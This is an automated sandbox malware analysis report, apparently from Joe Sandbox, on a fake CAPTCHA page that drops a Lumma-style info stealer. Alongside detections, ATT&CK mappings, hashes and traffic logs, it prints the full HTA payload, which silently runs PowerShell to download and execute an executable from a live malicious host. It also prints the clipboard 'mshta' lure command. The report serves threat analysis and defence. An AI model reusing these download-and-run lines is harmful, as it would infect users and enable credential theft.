                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

                          Stealing of Sensitive Information

                          Source: Yara match, File source: 12.2.Captcha.exe.14ac000.1.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 12.2.Captcha.exe.14ac000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 12.2.Captcha.exe.1632000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 12.2.Captcha.exe.1632000.2.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 12.3.Captcha.exe.1632000.11.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 12.3.Captcha.exe.1632000.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 12.3.Captcha.exe.14ac000.12.raw.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: 0000000C.00000002.2319031426.00000000014AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: 0000000C.00000002.2319503961.0000000001632000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: 0000000C.00000003.1835568834.00000000014AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                          Remote Access Functionality

                          Source: Yara match, File source: 12.2.Captcha.exe.14ac000.1.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 12.2.Captcha.exe.14ac000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 12.2.Captcha.exe.1632000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 12.2.Captcha.exe.1632000.2.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 12.3.Captcha.exe.1632000.11.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 12.3.Captcha.exe.1632000.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 12.3.Captcha.exe.14ac000.12.raw.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: 0000000C.00000002.2319031426.00000000014AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: 0000000C.00000002.2319503961.0000000001632000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match, File source: 0000000C.00000003.1835568834.00000000014AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                          Execution: 2 Command and Scripting Interpreter; 3 PowerShell; At; Cron; Launchd; Scheduled Task
                          Persistence: 3 Browser Extensions; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
                          Privilege Escalation: 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
                          Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading
                          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                          Discovery: 11 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
                          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                          Collection: 1 Email Collection; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                          Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication
                          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

                          [Behavior graph, ID: 1631656, start date: 07/03/2025, architecture: WINDOWS, score: 100. Process chain: cmd.exe -> mshta.exe -> powershell.exe -> Captcha.exe -> Captcha.exe; powershell.exe dropped C:\ProgramData\Captcha.exe (PE32). chrome.exe contacted rea.grupolalegion.ec (190.92.154.206), www.google.com (142.250.185.164) and 216.58.206.68 on port 443.]

                          No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\ProgramData\Captcha.exe | 100% | Avira | TR/Redcap.lcybk |
C:\ProgramData\Captcha.exe | 39% | ReversingLabs | Win32.Spyware.Lummastealer |
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
rea.grupolalegion.ec | 190.92.154.206 | true | false | | high
www.google.com | 142.250.185.164 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://rea.grupolalegion.ec/p.php/1?js | true | | unknown
phygcsforum.life | false | | high
techmindzs.live | false | | high
gadgethgfub.icu | false | | high
https://rea.grupolalegion.ec/p.php/1 | true | | unknown
moderzysics.top | false | | high
techspherxe.top | false | | high
https://rea.grupolalegion.ec/Viber.exe | true | | unknown
codxefusion.top | false | | high
https://rea.grupolalegion.ec/p.php | true | | unknown
culasova.icu | true | | unknown
https://rea.grupolalegion.ec/favicon.ico | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
190.92.154.206 | rea.grupolalegion.ec | Argentina | 10986 | DesarrollosDigitalesdePulsarConsultingAR | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
142.250.185.164 | www.google.com | United States | 15169 | GOOGLEUS | false
216.58.206.68 | unknown | United States | 15169 | GOOGLEUS | false

IP
192.168.2.8
                                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                                              Analysis ID:1631656
                                                                                                                              Start date and time:2025-03-07 13:20:23 +01:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 4m 29s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:browseurl.jbs
                                                                                                                              Sample URL:https://rea.grupolalegion.ec/p.php/1
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                              Number of analysed new started processes analysed:16
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.phis.troj.evad.win@27/16@11/5
                                                                                                                              EGA Information:Failed
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 80%
                                                                                                                              • Number of executed functions: 10
                                                                                                                              • Number of non-executed functions: 205
                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 216.58.212.131, 64.233.184.84, 142.250.185.174, 216.58.206.78, 142.250.185.206, 142.250.184.238, 199.232.210.172, 184.30.131.245, 172.217.16.206, 142.250.185.110, 142.250.74.206, 142.250.186.35, 142.250.185.238, 199.232.214.172, 23.60.203.209, 52.149.20.212, 13.107.246.60
                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                                                              • Not all processes were analyzed, report is missing behavior information
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                              • VT rate limit hit for: https://rea.grupolalegion.ec/p.php/1
Time | Type | Description
07:21:53 | API Interceptor | 1x Sleep call for process: mshta.exe modified
07:21:54 | API Interceptor | 43x Sleep call for process: powershell.exe modified
13:21:48 | Clipboard | Run: mshta https://rea.grupolalegion.ec/p.php
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2142592
                                                                                                                              Entropy (8bit):6.657298705059237
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:KVdGH7WBRxQvLkkYLg0ZXntxSFdIqLoG22f7mfI5nBEyMJmyW+UZuWkLpR5SgFm7:KCxt6PAkC/1Zgvm48zpQk6zC
                                                                                                                              MD5:05B7F29D1BAEAC0A7513D094BFC12A92
                                                                                                                              SHA1:47B0C9C07259F686C956F663FED28F3814484D0A
                                                                                                                              SHA-256:B311D9ACDE2A85424964D775779F3D9BA9FD4DB64A5595EC7AB64305F77C6A28
                                                                                                                              SHA-512:1DABCDA5F7F8E32AE0E7FB2F88B61D0DB8BDBA749C89F6707426F4AB4942E398E8D5155D5CE251A26977E0C747F177ED3EE4AD7DD37AE0F776776F0630C5CE5A
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                              Reputation:low
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........D...............(................... ....@...........................#......q!...@................................... .L..... .FA............ ..).... ......................................................!...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data... .... ......................@....idata..L..... .....................@....reloc........ .....................@..B.symtab....... ......D.................B.rsrc...FA.... ..B...F..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                              File Type:HTML document, ASCII text, with very long lines (693), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):693
                                                                                                                              Entropy (8bit):5.522043567403651
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:haxJWWdoF2Hctgf2B8qJps8AV+FGkOKodE6Iy1M456VmpfBaLWal0VxOJlMM+RHO:ha/4AHctQ2B87+8TKoDgZV8BJa6VxOrb
                                                                                                                              MD5:D1719DA179322B4243857F67C72CDAFD
                                                                                                                              SHA1:BEAEAEAEC2BF1E0BED7FF921FAFB574D8DD9E32B
                                                                                                                              SHA-256:6FEC9C5B0AF0BA477D75C7BC35571E3BC757B61B53260793425C7EA63228D084
                                                                                                                              SHA-512:1B2B312D802B6D3601F62345CF931DB65429F17588F85BC2AB989B84A35E6DBA6DDDC5CF3AA200CD160AE1AE2D5DF89FAC2AF021A690B492A47E9BD20472A309
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:<!DOCTYPE html><html><head><HTA:APPLICATION ID="CS" APPLICATIONNAME="Captcha" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no"><script>new ActiveXObject("Wscript.Shell").Run("powershell -ep Bypass -nop -c \"Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\\ProgramData\\Captcha.exe; Start-Process 'C:\\ProgramData\\Captcha.exe'\"",0);var filename = window.location.href;filename = decodeURI(filename);filename = filename.replace("file:///", "");var fso = new ActiveXObject("Scripting.FileSystemObject");if(fso.FileExists(filename)){try{fso.DeleteFile(filename,true)}catch(e){}}window.close()</script></head><body></body></html>
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1300
                                                                                                                              Entropy (8bit):5.399611626866461
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:3JytZWSKco4KmBs4RPT6BmFoUebIlmjKcmZ9t7J0gt/NK3R8QHr6+:5yjWSU4y4RQmFoUeUmfmZ9tK8NWR8QHb
                                                                                                                              MD5:FAD6E2EC9167F1EE2392CF4C5B6291B1
                                                                                                                              SHA1:12215DE530CECFB82B75925824E2890E8A1CD559
                                                                                                                              SHA-256:9C895259DD17D591C4532F01623D729978B09CBBEC228D66E5792078ED7A96C0
                                                                                                                              SHA-512:DEEBB7B7E52922DE6EF7320434F2342F5A9854B60E62B2B08A74EF40751180A3AE7E9C516A9943D3B7929BF36C080C22DFEF9E02ADD7B0C3317064BFD1475E56
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 7 11:21:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2677
                                                                                                                              Entropy (8bit):3.9785386414673067
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8t0dvTH/UHocidAKZdA1oehwiZUklqehLy+3:8tYbX8y
                                                                                                                              MD5:82E5F8DB18049AB3BEBB1EA528FA0057
                                                                                                                              SHA1:9AFCFD5D35F2B35BB38827CF45A629BEA62BC56F
                                                                                                                              SHA-256:3F069E892DD2E8102BDCBAC88D316FDC1C2896874DCA028B299A2F62FD409BE4
                                                                                                                              SHA-512:97A3CC12F4F68595022CA770DEEAF6B1D5FA5E1D44322D018E47E9D7F603B5C11B3AC3B20F7C37A1C6547B04D3C27020AFAD03739C0E8DBA551A2E392BF48FC2
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 7 11:21:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2679
                                                                                                                              Entropy (8bit):3.9945793929152513
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8r0dvTH/UHocidAKZdA1leh/iZUkAQkqehsy+2:8rYbd9Qly
                                                                                                                              MD5:B7FBA356D5E717AF9380E04942E32646
                                                                                                                              SHA1:EAC88BE533E7DC7BBB733637A8FB72221C1D7F96
                                                                                                                              SHA-256:2C5E19835B445F7F19140763CEA7905695E469EDEF196B068C843E5644310F9A
                                                                                                                              SHA-512:BF5EED30090F4C1E352C7868BB6B3F2BD5675434D7B4E8CF9C5B1AB4A1C7E965C8F3DAFAC8C107B9CD531B6992A9E95078A27B4FBEC43CF82DC5196ECB4B7F89
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2693
                                                                                                                              Entropy (8bit):4.004459347159963
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8G0dvTH/bHocidAKZdA14t5eh7sFiZUkmgqeh7s+y+BX:8GYbInwy
                                                                                                                              MD5:6306A8A1549805CF117538247B966100
                                                                                                                              SHA1:8343F5F933C88990592F90A78C3A3E1D778824D7
                                                                                                                              SHA-256:25B6061A94A802F2616767C107E1AE12E4E845E4193D4A8FADC08BA07E4EDB63
                                                                                                                              SHA-512:CB668980BFE5499D6362A4AC52DCC89AC02A92F40FC97D4AE389AD1DA0C973EAB4D17BAD0976133DD014615F036F8676202A41F1BAFDCD88166ECB1FE4A8CBA2
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 7 11:21:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2681
                                                                                                                              Entropy (8bit):3.990049851283437
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8aE0dvTH/UHocidAKZdA16ehDiZUkwqeh4y+R:8aEYbuGy
                                                                                                                              MD5:EB2BC5EFBAE553D7860D526112CB064A
                                                                                                                              SHA1:398C1CF077948194F11E29F4BA66D6E0AA84126E
                                                                                                                              SHA-256:20EEE047AA63E5298F1EE26F98A771F78AD62C627DA131B6394201735143055C
                                                                                                                              SHA-512:D55FD0577DEC038E71ADE9EA0B6AD1FF44AEC5E5C1F42BA5260D5A6E6B876FA4C9DDCBD8A66595E4468F35CFA44BFA79AB0CC19835DB6FA5FB490BA1A1AAB70A
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 7 11:21:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2681
                                                                                                                              Entropy (8bit):3.9829964551944985
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8U0dvTH/UHocidAKZdA1UehBiZUk1W1qehyy+C:8UYbe9Sy
                                                                                                                              MD5:2454419B3853BAE56206025F9489403F
                                                                                                                              SHA1:7AA036B85D5E2908F7A3FD1BBE27340CD23772E6
                                                                                                                              SHA-256:BAF3CC7C58180F8A2F8DD1AE1B716E93D589FFBEC3BB66A02587244844C27578
                                                                                                                              SHA-512:4105060B9A2862CE0154E21D879C66AF2E17F0D9D580EB7FD6A56776E4CF447FD157DDA7CA4E39443EAE95C3E72D5AF83EE26A4C68E9EE7D6FBD11F15E66C5A8
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 7 11:21:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2683
                                                                                                                              Entropy (8bit):3.9948227916265413
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8S0dvTH/UHocidAKZdA1duTrehOuTbbiZUk5OjqehOuTbwy+yT+:8SYbfTYTbxWOvTbwy7T
                                                                                                                              MD5:E7D58336447355800E270744345EBB2E
                                                                                                                              SHA1:B51EC2B11537E45DD4163C10C5996C5F79A7B106
                                                                                                                              SHA-256:D2303989E02CC22D4FE1274BC02538D95E2EB2FE6743D87C72992273B148AA75
                                                                                                                              SHA-512:0A9A018CAAC0551BFFB676E3C46BF5EA013E798548A05407E904FDA717AB0FE3E54555CF513B3728FFB3DE6D711B6B4D2C023D1E86BC2C302951CC8D8E8D903F
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (7901), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7901
                                                                                                                              Entropy (8bit):5.731855965219842
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:HkSx0WYqdTqHMd28ZNRGZkQxXV9ACSpyLrSEa9sSkStiSvlIJQsQsJJgOSgxypJ:HkSx/dTqsRNcZkQxXVuCswrSEa9sOtiQ
                                                                                                                              MD5:D6354873E4E824EE66C360997642EA15
                                                                                                                              SHA1:F16C1E3E2828766058C3DFCAFE19F07836E6EAD0
                                                                                                                              SHA-256:34A1149B16D38AB360978D13E576FA47DFC744F62F522991F4474F55537D3189
                                                                                                                              SHA-512:85AE6C79E881F88BDF55B0A7CA55E47FE8753D827676C174189170C4161325EB4CBD06032533158BD9248B6EB75A3AA29E0371829B9ADED2AFE6909120DA91B7
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:data
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):29998
                                                                                                                              Entropy (8bit):6.333826440851101
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:qwEdqpWhytmallAJOq7sPg38naSOM0mtvLQPWbh2:qwUqpBzs7IPgq4
                                                                                                                              MD5:8DC442A8012A07F1B41C09B0BA7E2D49
                                                                                                                              SHA1:FF962EEE714636C8A8D4F6C35D00BFE39463422C
                                                                                                                              SHA-256:8153B7B97B8024D671F5D82D7E58A7FD5AA6461D01856941B5C33A672219C2BA
                                                                                                                              SHA-512:728B84C085A08E69C5EACF223DB6D2528A102FEB01AA2163793ECA401BF832B3D1C1702DEA46A69DD748E1BEA2C4E27A070B23BE2AA7AB81364A3034D444AC8F
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              URL:https://rea.grupolalegion.ec/p.php/1
                                                                                                                              Preview:<!DOCTYPE html>.<html lang="en-US" dir="ltr">.<head>. <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />. <title>Just a moment...</title>. <meta http-equiv="X-UA-Compatible" content="IE=Edge" />. <meta name="robots" content="noindex,nofollow" />. <meta name="viewport" content="width=device-width,initial-scale=1" />. <style id=a></style><script>_='*{].:0.:0}html{.T15;-webkit-|-size-adjust:100%;.}butYn,html.sys.m-ui,-appO-sys.m,Bl.kMacSys.mFontW,RoboY,Helvetica Neue,Arial,NoY Sans,sans-sGif,AppO C/.W.W Symbol,NoY C/.}.{Z.;~100vh;m.-~100vh}..no-js `visibility:hidden}J^J a{.}J .J.J &JL+{..;.}+ a{.X}+ .+ .{..595959 . .}+ .fc574a}+ .D}a{.c/:.;.X...:c/ .15s ease}....{.:8.... ...G{.:2. 0V.G-Yp.V.G.{..:2.}.~2.;.-r...2.....}.~T.TP}V.w_ppG{align-i.ms:.;Z:1;fOx.}&.h1.2.P;.;.3.7PVh2{.}.,.h2.TP;.2.2PV.-|,.{.we.400V.-|.1.;.T2P.h1.TP;.T7PVh2.T2P}.,.h2{.TP}..1.}V|-.{..{..X;.:.063..#X..313.;..;.size:.87P;.T313.;.:2. 0.:.37P 1..-du_.:.2s.-propGty:.c
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (7901), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):7901
                                                                                                                              Entropy (8bit):5.731855965219842
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:HkSx0WYqdTqHMd28ZNRGZkQxXV9ACSpyLrSEa9sSkStiSvlIJQsQsJJgOSgxypJ:HkSx/dTqsRNcZkQxXVuCswrSEa9sOtiQ
                                                                                                                              MD5:D6354873E4E824EE66C360997642EA15
                                                                                                                              SHA1:F16C1E3E2828766058C3DFCAFE19F07836E6EAD0
                                                                                                                              SHA-256:34A1149B16D38AB360978D13E576FA47DFC744F62F522991F4474F55537D3189
                                                                                                                              SHA-512:85AE6C79E881F88BDF55B0A7CA55E47FE8753D827676C174189170C4161325EB4CBD06032533158BD9248B6EB75A3AA29E0371829B9ADED2AFE6909120DA91B7
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              URL:https://rea.grupolalegion.ec/p.php/1?js
                                                                                                                              No static file info
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-07T13:21:58.547161+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.8 | 49723 | 190.92.154.206 | 443 | TCP
2025-03-07T13:21:58.720947+0100 | 1810003 | Joe Security ANOMALY Windows PowerShell HTTP PE File Download | 2 | 190.92.154.206 | 443 | 192.168.2.8 | 49723 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                              Mar 7, 2025 13:21:41.009777069 CET44349716190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:41.009923935 CET49716443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:21:41.010391951 CET49716443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:21:41.010415077 CET44349716190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:41.045916080 CET44349717190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:41.097533941 CET49717443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:21:41.097562075 CET44349717190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:41.142988920 CET44349717190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:41.143006086 CET44349717190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:41.143088102 CET49717443192.168.2.8190.92.154.206
